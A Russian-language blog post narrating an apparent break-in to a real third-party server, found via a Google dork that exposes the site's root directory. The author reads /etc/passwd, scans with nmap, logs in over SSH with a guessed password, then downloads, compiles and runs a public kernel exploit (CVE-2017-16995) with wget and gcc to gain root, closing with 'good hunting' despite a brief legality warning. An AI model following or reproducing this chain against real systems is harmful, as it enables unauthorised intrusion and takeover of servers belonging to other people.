С помощью Google Dork's и эксплойтов
Всем салют, дорогие друзья! Для обычного пользователя, Google — это лишь поисковая система, используемая для поиска текста, изображений, видео и новостей. Однако, возможности гугла поистине впечатляют, на самом деле найти можно все, что душе угодно, в том числе и уязвимые сайты.
Кстати! Специально для вас я нашел реальный уязвимый сайт, чтобы показать вам все на реальном примере. Тем не менее, я не рекомендую вам пытаться находить уязвимости на сайтах, которые вам не принадлежат, если вы не имеете разрешение на проведение подобных действий. Это уголовно наказуемо.
Давайте начнем!
Итак, Google Dork, также известный как Google Dorking или Google Hacking, является ценным инструментом для хакера. Он содержит собственный встроенный язык запросов, так называемые "Операторы Google Dork" или, попросту говоря - "Дорки".
Оператор "inurl:" используется для получения результатов, URL-адрес которых содержит только одно ключевое слово, например, inurl: admin
С помощью Google Dork и оператора inurl: /proc/self/cwd мной и был обнаружен уязвимый сайт, который содержал ссылку, ведущую прямо в корневой каталог сервера:
Данная уязвимость заключается в том, что в каталоге сайта содержится символическая ссылка (symlink), которая ведёт в сам корневой каталог (/).
Получение информации о пользователях Linux
Итак, как только я попал в корневой каталог сервера, понадобилось узнать информацию о пользователях, которые существуют в системе. Они содержатся по пути /etc/passwd и /etc/shadow. Исходя из этого, мне нужен файл passwd, так как файл shadow попросту недоступен для обычного пользователя.
Имена обычных пользователей могут начинаться с идентификатора 1000. А вот пользователь kajari - именно тот, кто мне нужен.
Проверка на наличие открытого порта сервиса OpenSSH
Теперь с помощью инструмента Nmap я просканирую сервер на наличие открытых портов.
Открываю терминал и пишу следующую команду:
nmap site.go.idПолучаю вывод:
Как видите, порт 22 открыт и сервис OpenSSH запущен.
Замечательно! Иду дальше...
Вход по SSH
Теперь я подключаюсь к серверу по SSH от имени kajari и недолго думая, пытаюсь ввести банальный пароль, а именно, само имя пользователя (kajari) и-и...
Вуаля! Я вошел!
Конечно, это ещё далеко не финал. Теперь предстоит получить получить root доступ.
Так как версия Ubuntu и ядро Linux старые - я воспользуюсь скриптом "Linux Exploit Suggester" из репозитория GitHub. Он позволяет обнаружить проблемы с безопасностью машины с ядром Linux, а так же предоставляет ссылки на эксплоиты для данных уязвимостей.
Скачивание скрипта и поиск уязвимостей
Скачиваю и запускаю скрипт следующими командами:
wget -O search.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh chmod +x search.sh ./search.sh 
Скрипт вывел список с 4-мя уязвимостями. Более вероятная уязвимость — это CVE-2017-16995, именно ею я и воспользуюсь.
Скачивание, компиляция и запуск эксплойта
Из информации об уязвимости скачиваю эксплоит по ссылке, которая указана в "Download URL":
wget -O exploit_code.c https://www.exploit-db.com/download/45010С помощью компилятора GCC компилирую эксплоит в исполняемый файл:
gcc -o exploit exploit_code.cИ запускаю:
chmod +x exploit
./exploit 
Итак, дело сделано!
Только что, на ваших глазах, я получил root доступ и могу делать с сайтом и сервером совершенно все, что душе угодно. Об этом свидетельствует вывод команды whoami и приглашение к вводу (#).
На сегодня у меня все. Желаю удачной охоты ❤️
Comments